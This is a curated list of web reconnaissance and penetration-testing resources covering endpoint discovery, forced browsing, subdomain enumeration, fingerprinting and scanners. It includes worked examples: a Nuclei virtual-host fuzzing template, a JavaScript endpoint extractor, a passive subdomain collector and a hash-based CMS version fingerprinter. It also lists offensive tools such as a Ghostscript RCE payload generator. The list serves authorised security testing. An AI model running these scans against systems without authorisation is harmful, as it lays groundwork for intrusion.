- Kunyu aims to make corporate asset collection more efficient and enable more security-related practitioners to understand and use cyberspace surveying and mapping technology.
- Nuclei
- 101
- Nuclei
- Nuclei is used to send requests across targets based on a template, leading to zero false positives and providing fast scanning on a large number of hosts. Nuclei offers scanning for a variety of protocols, including TCP, DNS, HTTP, SSL, File, Whois, Websocket, Headless etc. With powerful and flexible templating, Nuclei can be used to model all kinds of security checks.
- Articles
- The Ultimate Guide to Finding Bugs With Nuclei - ProjectDiscovery(2022)
- Nuclei Templating Guide - ProjectDiscovery
- Nuclei Templates
- Community curated list of templates for the nuclei engine to find security vulnerabilities.
- Creating Custom Nuclei Templates and Workflows - JTCSEC(2021)
- A walkthrough for how to create a Nuclei template and turn it into a workflow. This is my first piece of content, so any feedback is greatly appreciated! If you have any suggestions for new things to cover, let me know!
- How-to-write-your-First-Nuclei-Template.pdf - DhiyaneshGeek
- Nuclei Templates Creation – My Experience - AndySvints(2021)
- Templates
- Virtual-Host
- Modified Nuclei Templates Version to FUZZ Host Header
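As an added illustration of what a Host-header fuzzing template looks like (this is not one of the templates linked above nor a ProjectDiscovery template), the following template sends the same raw request to the target with a series of candidate `Host` values and reports responses that are neither a 404 nor the catch-all default page. The candidate hostnames and the "Default Web Site" marker are assumptions; replace them with a wordlist and with a marker taken from a baseline request using a bogus Host value.

```yaml
id: vhost-host-header-fuzz

info:
  name: Virtual host discovery by Host header fuzzing
  author: example            # placeholder, not a real template author
  severity: info
  description: >
    Sends the same request to the target with a series of candidate Host
    values and reports any response that does not look like the catch-all
    default site. Candidate names and the default-page marker are assumptions.
  tags: vhost,recon

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{vhost}}
        User-Agent: Mozilla/5.0

    # One payload set, each candidate tried once (batteringram = single list).
    payloads:
      vhost:
        - admin.example.com
        - staging.example.com
        - intranet.example.com
        - dev.example.com
    attack: batteringram

    # Keep going after the first hit; several vhosts may live on one IP.
    stop-at-first-match: false

    # Report only when every matcher holds: not a 404, and not the default page.
    matchers-condition: and
    matchers:
      - type: status
        negative: true
        status:
          - 404

      - type: word
        part: body
        negative: true
        words:
          - "Default Web Site"   # marker of the catch-all page seen in the baseline request
```

Run it against the IP rather than a name, e.g. `nuclei -u http://203.0.113.10 -t vhost-host-header-fuzz.yaml`, so that only the fuzzed `Host` header changes between requests. Wildcard or dynamic default pages defeat a fixed marker; in that case do a baseline request first and switch the second matcher to a `dsl` check on body length.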
- 101
- Articles/Blogposts/Writeups
- Browser Automation
- playwright
- Node.js library to automate Chromium, Firefox and WebKit with a single API
- Browser/Client Fingerprinting (see also AnonOpSecPrivacy.md)
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Passive Fingerprinting of HTTP/2 Clients - Ory Segal, Aharon Fridman, Elad Shuster(2017)
- Two New Ways To Exploit A Fixed Browser Fingerprinting Flaw - Xiaoyin Liu(BSidesMunich 2019)
- QCSD: A QUIC Client-Side Website-Fingerprinting Defence Framework - Jean-Pierre Smith, Luca Dolfi, Prateek Mittal, Adrian Perrig(2022)
- "We observe that the rapid and wide-spread deployment of QUIC and HTTP/3 creates an exciting opportunity to build website-fingerprinting defences directly into client applications, such as browsers, without requiring any changes to web servers, VPNs, or the deployment of new network services. We therefore design and implement the QCSD framework, which leverages QUIC and HTTP/3 to emulate existing website-fingerprinting defences by bidirectionally adding cover traffic and reshaping connections solely from the client. As case studies, we emulate both the FRONT and Tamaraw defences solely from the client and collected several datasets of live-defended traffic on which we evaluated modern machine-learning based attacks. Our results demonstrate the promise of this approach in shaping connections towards client-orchestrated defences, thereby removing a primary barrier to the deployment of website-fingerprinting defences."
- Papers
- Tools
- CSS-Fingerprint
- An experimental method for CSS based fingerprinting and a pure CSS 'supercookie'.
- Sniffer
- Sniffer is a browser/engine/os/device detection tool. Works both in a browser and with Node.
- FingerprintJS
- FingerprintJS is a browser fingerprinting library that queries browser attributes and computes a hashed visitor identifier from them. Unlike cookies and local storage, a fingerprint stays the same in incognito/private mode and even when browser data is purged. FingerprintJS is 100% open-source, but its accuracy is limited because it's only a client-side library without a backend.
- TorZillaPrint
- TorZillaPrint (TZP) aims to provide a comprehensive, all-in-one, fingerprinting test suite, nicely broken into suitable sections with relevant information together. Long term, the goal is to collect Gecko only fingerprint data (no PII) for analysis to see how many classifications each metric or section provides.
- Browser-based Port Scan
- DNS
- See Network_Attacks.md -> DNS
- Endpoint Discovery
- Articles/Blogposts/Writeups
- Improving Internet Wide Scanning with Dynamic Scanning - Alexandre Dulaunoy(2021)
- HTTP Route Busting: Enumerating Routes Instead of Directories - Dejan Zelic
- Offensive Recon - Bug Hunter's Playbook - Harsh Bothra(2020)
- "Harsh Bothra is a security researcher and ranked as Bugcrowd Top 150 Hackers and MVP for 2020 Q1. He delivered this talk on offensive Recon."
- Bypassing the Redirect filters with 7 ways - elmahdi(2020)
- Tools
- JSParser
- A python 2.7 script using Tornado and JSBeautifier to parse relative URLs from JavaScript files. Useful for easily discovering AJAX requests when performing security research or bug bounty hunting.
- LinkFinder
- LinkFinder is a python script written to discover endpoints and their parameters in JavaScript files. This way penetration testers and bug hunters are able to gather new, hidden endpoints on the websites they are testing, resulting in new testing ground, possibly containing new vulnerabilities. It does so by using jsbeautifier for python in combination with a fairly large regular expression.
- relative-url-extractor
- During reconnaissance (recon) it is often helpful to get a quick overview of all the relative endpoints in a file. These days web applications have frontend pipelines that make it harder for humans to understand minified code. This tool contains a nifty regular expression to find and extract the relative URLs in such files. This can help surface new targets for security researchers to look at. It can also be used to periodically compare the results of the same file, to see which new endpoints have been deployed. History has shown that this is a goldmine for bug bounty hunters.
- hakrawler
- Simple, fast web crawler designed for easy, quick discovery of endpoints and assets within a web application
- Introducing Hakrawler: A Fast Web Crawler for Hackers - Luke Stephens(2020)
- endpointdiff
- endpointdiff is a simple wrapper script around LinkFinder (https://github.com/GerbenJavado/LinkFinder) to quickly identify whether endpoints have changed based on diffs of JS files.
- gau
- Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.
- FFUF Me - Target Practice For FFUF - https://github.com/adamtlangley/ffufme
- This is a simple website to get you used to using ffuf against a live target
- httpx
- "httpx is a fast and multi-purpose HTTP toolkit that allows running multiple probes using the retryablehttp library. It is designed to maintain result reliability with an increased number of threads."
- Kiterunner
- Kiterunner is a tool that is capable of not only performing traditional content discovery at lightning fast speeds, but also bruteforcing routes/endpoints in modern applications.
- httploot
- Blogpost
- An automated tool which can simultaneously crawl, fill forms, trigger error/debug pages and "loot" secrets out of the client-facing code of sites.
- reconFTW
- reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities
- redscan
- Redscan is built to discover exposed assets of a company, detect misconfigurations and compliance deviations. Redscan was conceived with the idea to automate the recon phase and the vulnerability assertion as referred to the Bug Bounty Methodology.
- page-fetch
- Fetch web pages using headless Chrome, storing all fetched resources including JavaScript files. Run arbitrary JavaScript on many web pages and see the returned values
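The tools above (JSParser, LinkFinder, relative-url-extractor, endpointdiff) share one idea: pull quoted endpoint-looking strings out of minified JavaScript, resolve them against the script's URL, and diff the result between crawls. The following is an added example of that pipeline written for this page; it is not the code of any of those projects, the regular expression is far narrower than LinkFinder's, and the bundle it parses is a constructed sample rather than a real site.

```python
import re
from urllib.parse import urljoin

# Quoted strings that look like endpoints: absolute or protocol-relative URLs,
# or paths beginning with "/", "./" or "../". Deliberately narrow (no bare
# words, no lone "/") to keep the noise from minified bundles low.
ENDPOINT_RE = re.compile(
    r"""["'`]("""
    r"""(?:https?:)?//[A-Za-z0-9_.\-]+(?::\d+)?(?:/[^"'`\s<>]*)?"""  # absolute URL
    r"""|\.{0,2}/[A-Za-z0-9_.\-/?=&%]{1,200}"""                     # relative path
    r""")["'`]"""
)

# Constructed sample of a minified bundle (not taken from any real application).
SAMPLE_JS = r"""
const API="/api/v1/users";fetch(API+"/"+id);
fetch('/api/v1/users/'+id+'/export?format=csv');
const cdn="https://cdn.example.com/lib/app.min.js";x.src='./static/app.js';
debug&&fetch("../internal/debug");var n=a/b;var s="/";
"""


def extract_endpoints(js: str) -> set:
    """Return the de-duplicated set of endpoint-looking strings in a JS file."""
    return set(ENDPOINT_RE.findall(js))


def resolve_all(script_url: str, endpoints: set) -> set:
    """Resolve relative endpoints against the URL the script was loaded from,
    so "../internal/debug" found in /static/js/bundle.js becomes a real path."""
    return {urljoin(script_url, e) for e in endpoints}


def diff_endpoints(old: set, new: set) -> tuple:
    """(added, removed) between two crawls of the same script: the endpointdiff idea."""
    return new - old, old - new


if __name__ == "__main__":
    found = extract_endpoints(SAMPLE_JS)
    for url in sorted(resolve_all("https://app.example.com/static/js/bundle.js", found)):
        print(url)
```

Concatenated paths such as `API+"/"+id` are the reason the regex is not enough on its own: only the static prefix is recovered, and the parameterised part has to be read out of the surrounding code. Persist each crawl's resolved set and run `diff_endpoints` on the next one to catch newly deployed routes.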
- Articles/Blogposts/Writeups
- Forced Browsing
- Articles/Blogposts/Writeups
- Tools
- Dirbuster
- DirBuster is a multi threaded Java application designed to brute force directory and file names on web/application servers. It is often the case that what looks like a web server in a default installation is actually not, and has pages and applications hidden within it. DirBuster attempts to find these.
- Go Buster
- Directory/file busting tool written in Go; Recursive, CLI-based, no java runtime
- WFuzz
- Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc), bruteforce GET and POST parameters for checking different kind of injections (SQL, XSS, LDAP,etc), bruteforce Forms parameters (User/Password), Fuzzing,etc
- dirsearch
- dirsearch is a simple command line tool designed to brute force directories and files in websites.
- ffuf
- Fast web fuzzer written in Go
- Everything you need to know about FFUF - codingo(2020)
- ffuf on Steroids - securityjunky.com
- Tachyon
- Tachyon is a Fast Multi-Threaded Web Discovery Tool
- Syntribos
- Given a simple configuration file and an example HTTP request, syntribos can replace any API URL, URL parameter, HTTP header and request body field with a given set of strings. Syntribos iterates through each position in the request automatically. Syntribos aims to automatically detect common security defects such as SQL injection, LDAP injection, buffer overflow, etc. In addition, syntribos can be used to help identify new security defects by automated fuzzing.
- OpenDoor
- OpenDoor OWASP is a multifunctional console web site scanner. It tries to find all possible ways to log in, index of/ directories, web shells, restricted access points, subdomains, hidden data and large backups. Scanning uses the built-in dictionary as well as external dictionaries. Anonymity and speed are provided by means of proxy servers.
- rustbuster
- A Comprehensive Web Fuzzer and Content Discovery Tool
- feroxbuster
- A fast, simple, recursive content discovery tool written in Rust.
- SharpBuster
- SharpBuster is a C# implementation of a directory brute forcing tool. It's designed to be used via Cobalt Strike's execute-assembly and similar tools, when running a similar tool over a SOCKS proxy is not feasible.
- FES - Fast Endpoint Scanner
- A web application endpoint scanner written in Rust, designed to put less load on the domains it scans with parsing features to help grab the important stuff (inspired by tomnomnom's meg).
- WAES
- CPH:SEC WAES: Web Auto Enum & Scanner - Auto enums website(s) and dumps files as result
- crithit
- Website Directory and file brute forcing at extreme scale.
- snallygaster
- Finds file leaks and other security problems on HTTP servers.
- HTTP Enumeration
- Articles/Blogposts/Writeups
- Tools
- Arjun
- HTTP parameter discovery suite.
- Psi-Probe
- Advanced manager and monitor for Apache Tomcat, forked from Lambda Probe
- HTTPLeaks
- HTTPLeaks - All possible ways, a website can leak HTTP requests
- HTTPie - curl for humans
- HTTPie (pronounced aych-tee-tee-pie) is a command line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. It provides a simple http command that allows for sending arbitrary HTTP requests using a simple and natural syntax, and displays colorized output. HTTPie can be used for testing, debugging, and generally interacting with HTTP servers.
- gethead
- HTTP Header Analysis Vulnerability Tool
- HTTP Fingerprinting
- Articles/Blogposts/Writeups
- Tools
- GoFingerprint
- GoFingerprint is a Go tool for taking a list of target web servers and matching their HTTP responses against a user defined list of fingerprints.
- JS-based scanning
- Articles/Blogposts/Writeups
- Exposing Intranets with reliable Browser-based Port scanning - Gareth Heyes
- In this blog post I describe how I created a port scanner using JavaScript.
- JS-Recon detailed. Analyzing the internal network with a XSS - Jorge Lajara (2018)
- Scanning JS Files for Endpoints and Secrets - securityjunky.com
- Tools
- Articles/Blogposts/Writeups
- (Sub)Domain Reconnaissance
- Articles/Blogposts/Writeups
- Subdomain Enumeration: 2019 Workflow - Patrik Hudak
- [The Art of Subdomain Enumeration - Patrik Hudak(2017)](https://blog.sweepatic.com/art-of-subdomain-enumeration/)
- A penetration tester’s guide to subdomain enumeration - Bharath(2017)
- Domain Discovery
- Discovering Domains via a Time-Correlation Attack on Certificate Transparency - Arseniy Sharoglazov(2022)
- DRROBOT
- Dr.ROBOT is a tool for Domain Reconnaissance and Enumeration. By utilizing containers to reduce the overhead of dealing with dependencies, inconsistencies across operating systems, and different languages, Dr.ROBOT is built to be highly portable and configurable.
- assetfinder
- Find domains and subdomains potentially related to a given domain.
- Domains project
- "World’s single largest Internet domains dataset"
- ripgen
- A rust-based version of the popular dnsgen python utility.
- Finddomain
- The fastest and complete solution for domain recognition. Supports screenshoting, port scan, HTTP check, data import from other tools, subdomain monitoring, alerts via Discord, Slack and Telegram, multiple API Keys for sources and much more.
- Subdomain Discovery Tools
- Sudomy
- Sudomy is a subdomain enumeration tool, created using a bash script, to analyze domains and collect subdomains in fast and comprehensive way.
- domains-from-csp
- A Python script to parse domain names from CSP header
- pdlist - A passive subdomain finder
- pdlist is a passive subdomain finder written in python3. This tool can be used effectively to collect information about a domain without ever sending a single packet to any of its hosts. Given a domain like "example.com" it will find all the hosts which have a hostname <something>.example.com or URLs strictly related to example.com.
- Find-Domains
- This repo contain scripts written for finding subdomains using various available tools
- sub-differ
- take a list of old subdomain and new subdomain and the output is the deleted subdomain and the new subdomain
- OneForAll
- subscraper
- Perform subdomain enumeration through various techniques and retrieve detailed output to aid in further testing.
- subfinder
- Subfinder is a subdomain discovery tool that discovers valid subdomains for websites. Designed as a passive framework to be useful for bug bounties and safe for penetration testing.
- Dome
- Fast and reliable python script that makes active and/or passive scan to obtain subdomains and search for open ports.
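Several of the tools listed above are purely passive: domains-from-csp reads hostnames out of a Content-Security-Policy header, subfinder and pdlist pull names from third-party sources such as certificate transparency, and sub-differ compares the results over time. The following is an added example of those two passive sources and the scope filter that keeps only names under the target root; it is written for this page, is not the code of any tool listed here, and works on a constructed CSP header and constructed CT-style records rather than on live data.

```python
from typing import Optional
from urllib.parse import urlparse

# Constructed header (not from any real site). CSP source lists leak the
# origins an application talks to: CDNs, APIs, websocket hosts, SSO frames.
SAMPLE_CSP = (
    "default-src 'self'; "
    "script-src 'self' https://cdn.example.com https://*.analytics.example.com 'unsafe-inline'; "
    "connect-src https://api.example.com wss://push.example.com:8443; "
    "img-src data: https://img.example.net; "
    "frame-src https://login.example.com"
)

# Constructed records shaped like the JSON a certificate-transparency search
# service returns: one entry per certificate, SANs separated by newlines.
SAMPLE_CT_RECORDS = [
    {"name_value": "dev.example.com\nstaging.example.com"},
    {"name_value": "*.example.com"},
    {"name_value": "mail.example.org"},
]


def _hostname(token: str) -> Optional[str]:
    """Turn one CSP source expression into a bare hostname, or None if it has none."""
    if token.startswith("'"):                       # 'self', 'unsafe-inline', 'nonce-...'
        return None
    if token.endswith(":") and "//" not in token:   # scheme-only sources: data:, blob:
        return None
    if "//" not in token:                           # host-only source: cdn.example.com
        token = "//" + token
    host = urlparse(token).hostname                 # strips scheme, port, path
    if not host:
        return None
    return host[2:] if host.startswith("*.") else host


def domains_from_csp(header: str) -> set:
    hosts = set()
    for directive in header.split(";"):
        parts = directive.split()
        for token in parts[1:]:                     # parts[0] is the directive name
            host = _hostname(token)
            if host:
                hosts.add(host)
    return hosts


def domains_from_ct(records: list) -> set:
    hosts = set()
    for rec in records:
        for name in rec["name_value"].split("\n"):
            name = name.strip().lower()
            if name:
                hosts.add(name[2:] if name.startswith("*.") else name)
    return hosts


def in_scope(hosts: set, root: str) -> set:
    """Keep the root and its subdomains; drop look-alike and third-party names."""
    root = root.lower()
    return {h for h in hosts if h == root or h.endswith("." + root)}


if __name__ == "__main__":
    candidates = domains_from_csp(SAMPLE_CSP) | domains_from_ct(SAMPLE_CT_RECORDS)
    for host in sorted(in_scope(candidates, "example.com")):
        print(host)
```

Neither step sends a packet to the target; the CSP header comes from a single response you already have and the CT records from the log operator. Out-of-scope names such as `img.example.net` are still worth noting separately, since they often belong to the same organisation, but they must not be fed into active scanning by accident, which is what the scope filter prevents.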
- Articles/Blogposts/Writeups
- Javascript
- Articles/Blogposts/Writeups
- Tools
- SecretFinder
- A python script for find sensitive data (apikeys, accesstoken,jwt,..) and search anything on javascript files
- Technology Identification
- Articles/Blogposts/Writeups
- Tools
- General
- wappy
- A tool to discover technologies in web applications from your terminal. It uses the wap library, that is a python implementation of the great Wappalyzer browser extension. In fact, it uses the rules defined in the file technologies.json of the Wappalyzer repository.
- CMS
- CMSExplorer
- CMS Explorer is designed to reveal the specific modules, plugins, components and themes that various CMS driven web sites are running. Additionally, CMS Explorer can be used to aid in security testing. While it performs no direct security checks, the "explore" option can be used to reveal hidden/library files which are not typically accessed by web clients but are nonetheless accessible. This is done by retrieving the module's current source tree and then requesting those file names from the target system. These requests can be sent through a distinct proxy to help "bootstrap" security testing tools like Burp, Paros, Webinspect, etc.
- BlindElephant Web Application Fingerprinter
- The BlindElephant Web Application Fingerprinter attempts to discover the version of a (known) web application by comparing static files at known locations against precomputed hashes for versions of those files in all available releases. The technique is fast, low-bandwidth, non-invasive, generic, and highly automatable.
- Fingerprinter
- CMS/LMS/Library etc Versions Fingerprinter. This script's goal is to try to find the version of the remote application/third party script etc by using a fingerprinting approach.
- WPScan
- WPScan is a free, for non-commercial use, black box WordPress security scanner written for security professionals and blog maintainers to test the security of their WordPress websites.
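BlindElephant's approach (and Fingerprinter's) is worth seeing in code because it is the rare fingerprinting method that needs no banner and no error page: hash a few static files the application ships unchanged and intersect the sets of releases known to contain each hash. The example below is added for this page and is not BlindElephant's code; the three-version "release archive" and the target's files are constructed, and `fetch` is a stand-in for an HTTP client.

```python
import hashlib
from typing import Callable, Optional

# Constructed release archive: version -> {static path: exact file bytes}.
# A real database is built by unpacking every published release.
RELEASES = {
    "1.0.0": {"/readme.html": b"<h1>Demo CMS</h1>\n", "/js/app.js": b"var V='1.0.0';\n"},
    "1.0.1": {"/readme.html": b"<h1>Demo CMS</h1>\n", "/js/app.js": b"var V='1.0.1';\n"},
    "1.1.0": {"/readme.html": b"<h1>Demo CMS 1.1</h1>\n", "/js/app.js": b"var V='1.1.0';\n"},
}


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_db(releases: dict) -> dict:
    """path -> {sha256 of file content -> set of versions shipping that exact content}."""
    db: dict = {}
    for version, files in releases.items():
        for path, content in files.items():
            db.setdefault(path, {}).setdefault(sha256(content), set()).add(version)
    return db


DB = build_db(RELEASES)


def identify_version(fetch: Callable[[str], Optional[bytes]], db: dict = DB) -> set:
    """Intersect the version sets of every static file whose hash is known.

    `fetch(path)` returns the raw body or None for a 404. Missing files and
    unknown hashes (locally edited, re-minified by a CDN) add no constraint;
    each known hash narrows the candidate set further.
    """
    candidates: Optional[set] = None
    for path, hashes in db.items():
        body = fetch(path)
        if body is None:
            continue
        versions = hashes.get(sha256(body))
        if not versions:
            continue
        candidates = set(versions) if candidates is None else candidates & versions
    return candidates or set()


if __name__ == "__main__":
    # Constructed target that serves the 1.0.1 files; a real fetch would be
    # requests.get(base + path).content guarded by a status check.
    target = RELEASES["1.0.1"]
    print(identify_version(lambda p: target.get(p)))   # {'1.0.1'}
```

The readme alone only narrows the target to two releases; the second file resolves it. Choose files that CDNs and build pipelines leave byte-identical (licence texts, vendored libraries, locale files) and hash the body after transfer decoding, because a single changed line ending produces an unknown hash and silently drops the constraint.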
- Proxies
- Web Filter External Enumeration Tool (WebFEET)
- WebFEET is a web application for the drive-by enumeration of web security proxies and policies. See associated white paper (Drive-by enumeration of web filtering solutions)
- Web Servers
- httprecon - Advanced Web Server Fingerprinting
- The httprecon project is doing some research in the field of web server fingerprinting, also known as http fingerprinting. The goal is the highly accurate identification of given httpd implementations. This is very important within professional vulnerability analysis. Besides the discussion of different approaches and the documentation of gathered results also an implementation for automated analysis is provided. This software shall improve the ease and efficiency of this kind of enumeration. Traditional approaches such as banner grabbing, status code enumeration and header ordering analysis are used. However, many other analysis techniques were introduced to increase the possibilities of accurate web server fingerprinting. Some of them were already discussed in the book Die Kunst des Penetration Testing (Chapter 9.3, HTTP-Fingerprinting, pp. 530-550).
- WhatWeb
- WhatWeb identifies websites. Its goal is to answer the question, "What is that Website?". WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1500 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.
- General
- Web Scraping
- 101
- Articles/Papers/Talks/Writeups
- So you want to Scrape like the Big Boys? 🚀 - incolumitas.com(2021)
- Harden Vanilla Puppeteer
- A conceptual patch which modifies some vanilla puppeteer files to decrease detection rates.
- General
- browser-fingerprinting
- "Analysis of Bot Protection systems with available countermeasures 🚿. How to defeat anti-bot system 👻 and get around browser fingerprinting scripts 🕵️♂️ when scraping the web?"
- Tools
- Puppeteer
- Puppeteer is a Node library which provides a high-level API to control Chrome or Chromium over the DevTools Protocol. Puppeteer runs headless by default, but can be configured to run full (non-headless) Chrome or Chromium.
- dvcs-ripper
- Rip web accessible (distributed) version control systems: SVN, GIT, Mercurial/hg, bzr, ... It can rip repositories even when directory browsing is turned off.
- Scrapy
- An open source and collaborative framework for extracting the data you need from websites.
- Beautiful Soup
- Miscellaneous
- WeasyPrint
- WeasyPrint is a visual rendering engine for HTML and CSS that can export to PDF. It aims to support web standards for printing. WeasyPrint is free software made available under a BSD license.
- User Enumeration
- Articles/Blogposts/Writeups
- Tools
- WhatsMyName
- This repository has the unified data required to perform user enumeration on various websites. Content is in a JSON file and can easily be used in other projects.
- hackability
- Rendering Engine Hackability Probe performs a variety of tests to discover what the unknown rendering engine supports. To use it simply extract it to your web server and visit the url in the rendering engine you want to test. The more successful probes you get the more likely the target engine is vulnerable to attack.
- Virtual Hosts
- 101
- Tools
- virtual-host-discovery
- This is a basic HTTP scanner that'll enumerate virtual hosts on a given IP address. During recon, this might help expand the target by detecting old or deprecated code. It may also reveal hidden hosts that are statically mapped in the developer's /etc/hosts file.
- blacksheepwall
- blacksheepwall is a hostname reconnaissance tool
- VHostScan
- A virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, work around wildcards, aliases and dynamic default pages.
- Visual Reconnaissance
- Articles/Blogposts/Writeups
- Tools
- Snapback
- Snapback is a HTTP(s) screenshot tool written to take advantage of asynchronous threading in Nodejs. It's like EyeWitness, gowitness, and rawr, etc. but generally faster, and compatible with MacOS, Windows, and Linux.
- PowerWebShot
- A PowerShell tool for taking screenshots of multiple web servers quickly.
- HTTrack - Website Copier
- It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system.
- Kraken
- Kraken is a tool to help make your web interface testing workflow more efficient. This is done by using Django, Apache, and a MySQL database to store and organize web interface screenshots and data. This allows you and your team to take notes and track which hosts have been tested simultaneously. Once you are finished, you can view these notes you took and generate reports in the Reports section.
- Eyeballer
- Eyeballer is meant for large-scope network penetration tests where you need to find "interesting" targets from a huge set of web-based hosts. Go ahead and use your favorite screenshotting tool like normal (EyeWitness or GoWitness) and then run them through Eyeballer to tell you what's likely to contain vulnerabilities, and what isn't.
- gowitness
- gowitness is a website screenshot utility written in Golang, that uses Chrome Headless to generate screenshots of web interfaces using the command line. Both Linux and macOS are supported, with Windows support 'partially working'.
- webscreenshot
- A simple script to screenshot a list of websites, based on the url-to-image PhantomJS script.
- LazyShot
- The simplest way to take an automated screenshot of given URLs. Easy installation!
- RAWR - Rapid Assessment of Web Resources
- EyeWitness
- EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible.
- SharpWitness
- C# implementation of EyeWitness
- webDisco
- Web discovery tool to capture screenshots from a list of hosts & vhosts. Requests are made via IP address and vhosts to determine differences. Additionally checks for common administrative interfaces and web server misconfigurations.
- electric-scan
- Electron based screenshot scanner
- EyeWitnessTheFitness
- Generate one FireProx API to be used for all your EyeWitness targets, making your enumeration both opsec-friendly and convenient.
- 3rd Party Hosted Tools
- VisualSiteMapper
- Visual Site Mapper is a free service that can quickly show a map of your site.
- Web Page
- HTCAP
- htcap is a web application scanner able to crawl single page application (SPA) recursively by intercepting ajax calls and DOM changes.
- General Articles/Methodology Writeups
- Vulnerability Scanner
- Nikto
- Spaghetti - Web Application Security Scanner
- Spaghetti is an Open Source web application scanner, it is designed to find various default and insecure files, configurations, and misconfigurations. Spaghetti is built on python2.7 and can run on any platform which has a Python environment.
- skipfish
- Skipfish is an active web application security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes. The resulting map is then annotated with the output from a number of active (but hopefully non-disruptive) security checks. The final report generated by the tool is meant to serve as a foundation for professional web application security assessments.
- wikto
- Wikto is Nikto for Windows - but with a couple of fancy extra features including Fuzzy logic error code checking, a back-end miner, Google assisted directory mining and real time HTTP request/response monitoring. Wikto is coded in C# and requires the .NET framework.
- WATOBO
- WATOBO is a security tool for testing web applications. It is intended to enable security professionals to perform efficient (semi-automated) web application security audits.
- YASUO
- Yasuo is a ruby script that scans for vulnerable 3rd-party web applications.
- ParrotNG
- ParrotNG is a tool capable of identifying Adobe Flex applications (SWF) vulnerable to CVE-2011-2461
- Arachni Web Scanner
- Arachni is an Open Source, feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications. It is smart, it trains itself by monitoring and learning from the web application's behavior during the scan process and is able to perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify (or avoid) false-positives.
- Pyfiscan
- Pyfiscan is free web-application vulnerability and version scanner and can be used to locate out-dated versions of common web-applications in Linux-servers. Example use case is hosting-providers keeping eye on their users installations to keep up with security-updates. Fingerprints are easy to create and modify as user can write those in YAML-syntax. Pyfiscan also contains tool to create email alerts using templates.
- jaeles
- "powerful, flexible and easily extensible framework written in Go for building your own Web Application Scanner."
- Showcase examples of usage
- 0d1n
- 0d1n is a tool for automating customized attacks against web applications.
- reNgine
- reNgine is an automated reconnaissance framework meant for gathering information during penetration testing of web applications. reNgine has customizable scan engines, which can be used to scan the websites, endpoints, and gather information.
- Osmodeus
- Fully automated offensive security framework for reconnaissance and vulnerability scanning
- jsgifkeylogger
- a javascript keylogger included in a gif file This is a PoC
- Images
- PDFs
- 101
- Articles/Blogposts/Writeups
- Export Injection - Inon Shkedy(2018)
- Postscript Pat and His Black and White Hat - Steven Seeley(2019)
- How To Spoof PDF Signatures - Jens Müller, Dominik Noss, Christian Mainka, Vladislav Mladenov, Jörg Schwenk (2019)
- PDFex: Major Security Flaws in PDF Encryption - Jens Müller, Dominik Noss, Christian Mainka, Vladislav Mladenov, Jörg Schwenk (2019)
- Ghostscript SAFER Sandbox Breakout (CVE-2020-15900) - Tim Goddard(2020)
- Portable Data exFiltration: XSS for PDFs - Gareth Hayes(2020)
- Insecure Features in PDFs - Jens Müller, Dominik Noss, Christian Mainka, Vladislav Mladenov, Jörg Schwenk (2021)
- Talks/Presentations/Videos
- HotPics 2021 - Emil Lerner(ZeroNights2021)
- Slides
- Emil Lerner considers the current state of the web application attack vector via image conversion. What configurations are still vulnerable, and how to make sure that notifications about potential RCEs are (almost) automatically sent to your Telegram account? As a bonus, there are bug-bounty stories. One is more interesting than another.
- Tools
- RCE-0-day-for-GhostScript-9.50
- RCE 0-day for GhostScript 9.50 - Payload generator
- Ghostinthepdf
- This is a small tool that helps to embed a PostScript file into a PDF in a way that GhostScript will run the PostScript code during the PDF processing. The goal of the embedding is to run exploits against GhostScript. The output file is a semi-correct PDF that should bypass most signature checks. Thus, if you have an exploit that bypasses -dSAFER, you can "embed" it into a PDF using this tool and upload the resulting file to the target.
- See 'Forced-Browsing'
- Web Cache Deception Attack
- 101
- Articles/Blogposts/Writeups
- Papers
- Cached and Confused: Web Cache Deception in the Wild - Seyed Ali Mirheidari, Sajjad Arshad, Kaan Onarlioglu, Bruno Crispo, Engin Kirda, William Robertson(2020)
- Web cache deception (WCD) is an attack proposed in 2017, where an attacker tricks a caching proxy into erroneously storing private information transmitted over the Internet and subsequently gains unauthorized access to that cached data. Due to the widespread use of web caches and, in particular, the use of massive networks of caching proxies deployed by content distribution network (CDN) providers as a critical component of the Internet, WCD puts a substantial population of Internet users at risk. We present the first large-scale study that quantifies the prevalence of WCD in 340 high-profile sites among the Alexa Top 5K. Our analysis reveals WCD vulnerabilities that leak private user data as well as secret authentication and authorization tokens that can be leveraged by an attacker to mount damaging web application attacks. Furthermore, we explore WCD in a scientific framework as an instance of the path confusion class of attacks, and demonstrate that variations on the path confusion technique used make it possible to exploit sites that are otherwise not impacted by the original attack. Our findings show that many popular sites remain vulnerable two years after the public disclosure of WCD. Our empirical experiments with popular CDN providers underline the fact that web caches are not plug & play technologies. In order to mitigate WCD, site operators must adopt a holistic view of their web infrastructure and carefully configure cache settings appropriate for their applications.
- Talks/Presentations/Videos
- Web Cache Deception Attack - Omer Gil(BHUSA 2017)
- slides
- Web Cache Deception attack is a new web attack vector that puts various technologies and frameworks at risk. By manipulating behaviors of web servers and caching mechanisms, anonymous attackers can expose sensitive information of authenticated application users, and in certain cases even take control over their accounts.
- Web Cache Deception attack: A new web attack vector -
